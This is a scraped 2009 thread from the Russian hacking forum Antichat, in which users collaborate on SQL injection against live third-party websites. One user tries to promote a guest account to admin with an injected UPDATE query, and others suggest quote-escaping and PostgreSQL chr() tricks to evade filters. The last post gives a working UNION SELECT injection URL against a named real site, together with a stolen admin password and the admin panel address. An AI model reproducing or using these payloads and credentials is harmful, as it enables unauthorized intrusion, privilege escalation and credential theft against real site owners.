Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.01.2009, 03:13
|
|
Новичок
Регистрация: 26.06.2007
Сообщений: 27
Провел на форуме:
267117
Репутация:
1
|
|
Сообщение от groundhog
Ты от гостя пароль подобрал? В админку гостем заходишь? Что за бред? Сделать тут можно только одно - учить FAQ и учить и учить и учить... Ты где-нибудь видел в факе, чтобы народе через инъекцию делал UNION на SELECT и UPDATE? Этого не возможно сделать!
Просто пользователь называется guest. А сайт то самописный... нашел в базе столбец который дает права или админа или пользователя - usertype admin , guest , постандарту ставит всем guest. Помогите составить правильный запрос чтобы обновить поле с значение guest на админ. Пробовал вот такой запрос http://**/id=99999'%20UPDATE 'aut' SET usertype='admin' WHERE user_id=2 но база видает ошибку right syntax to use near 'UPDATE \'aut\' SET usertype=\'admin\' WHERE user_id=2' at line 1
|
|
|
29.01.2009, 03:25
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Ах,да.Забыл упомянуть,что char не поддерживается и кавычки убийственны,посему и работают только подзапросы и запросы без кавычек =_=.Хекс тоже не катит.
Последний раз редактировалось Велемир; 29.01.2009 в 03:29..
|
|
|
|
29.01.2009, 03:27
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от omel
Просто пользователь называется guest. А сайт то самописный... нашел в базе столбец который дает права или админа или пользователя - usertype admin , guest , постандарту ставит всем guest. Помогите составить правильный запрос чтобы обновить поле с значение guest на админ. Пробовал вот такой запрос http://**/id=99999'%20UPDATE 'aut' SET usertype='admin' WHERE user_id=2 но база видает ошибку right syntax to use near 'UPDATE \'aut\' SET usertype=\'admin\' WHERE user_id=2' at line 1
кавычки экранируются во первых...
|
|
|
|
29.01.2009, 03:28
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
ссыль дай
сорри, не заметил
Последний раз редактировалось Pashkela; 29.01.2009 в 03:39..
|
|
|
|
29.01.2009, 03:30
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от Pashkela
ссыль дай
Кому адресовано?))
|
|
|
|
29.01.2009, 03:32
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от Велемир
Ах,да.Забыл упомянуть,что char не поддерживается и кавычки убийственны,посему и работают только подзапросы и запросы без кавычек =_=.Хекс тоже не катит.
Я и говорю, хекс не катит, а char действует. Просто надо чарить не как в MYSQL...
Вот например таблица user, переведённая в char для PostgreSQL.
chr(117)||chr(115)||chr(101)||chr(114)
|
|
|
|
29.01.2009, 03:35
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Тьфу,чёрт...А я думал,что это пробел.Это OR чтоль ? Лан,пасип те большое.Завтра попробую...а сейчас сонная дрема меня заберёт(
|
|
|
|
29.01.2009, 03:45
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Велемир
Тьфу,чёрт...А я думал,что это пробел.Это OR чтоль ? Лан,пасип те большое.Завтра попробую...а сейчас сонная дрема меня заберёт(
это конкатенация
|
|
|
|
29.01.2009, 03:49
|
|
Новичок
Регистрация: 26.06.2007
Сообщений: 27
Провел на форуме:
267117
Репутация:
1
|
|
Сообщение от попугай
кавычки экранируются во первых...
Так значит вместо кавычек ставить %27? запрос
UPDATE+%27auth%27'+SET+usertype=%27admin%27+WHERE+ user_id=2
|
|
|
|
29.01.2009, 03:51
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
аж смешно,вот ещё одна така скуль
Код:
http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,username,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20FROM%20admin--
пароли такие же..
admin::root78
http://sex.dp.ua/admin.php
юзеров воще не нашол |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
